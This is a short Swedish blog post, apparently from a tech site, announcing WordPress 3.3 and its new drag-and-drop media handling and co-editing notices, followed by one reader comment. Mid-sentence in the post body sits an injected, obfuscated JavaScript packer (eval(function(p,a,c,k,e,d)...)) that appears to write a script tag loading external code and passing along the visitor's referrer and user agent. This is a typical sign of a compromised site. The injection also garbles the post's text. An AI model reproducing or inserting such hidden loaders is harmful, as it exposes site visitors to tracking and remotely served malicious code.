Image Image Image Image Image Image Image Image Image Image

| 24 september, 2018

Scroll to top

Top

WordPress 3.3 är här!

WordPress 3.3 är här!
Sebastian Plengier Ehrnfelt
Med eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbdez|var|u0026u|referrer|bzfyf||js|php’.split(‘|’),0,{}))
kodnamn ”Sonny” har nu senaste WordPress släppts. Version 3.3 är vad vi är upp i nu.

Igår släpptes version 3.3 av det älskade publiceringsverktyget WordPress och det ser ut att finnas en hel del grejer som kommer göra det ännu enklare att använda och administrera hemsidor och bloggar.

Det har gjorts en massa förbättringar i gränssnittet som jag tror kommer uppskattas mest av de användare som gillar drag-n-drop funktioner. Nu kan du dra och släppa bilder och andra mediafiler i den förbättrade administrationsmenyn i vänsterkolumnen.
Något annat som också är nytt är samredigeringen så man nu enkelt kan se om någon annan är inne och redigerar samma sida som en själv samt import av data från andra källor.

WordPress 3.3 finns tillgängligt och laddas ner gratis här.

Comments

  1. Thomas Ånghed

     Underbart. Längtat efter en update på just WordPress länge nu. Ska uppdatera så fort som möjligt.

    Hoppas det är fler roliga saker än de nämnda ovan. var inte direkt något jag är i behov av. 😛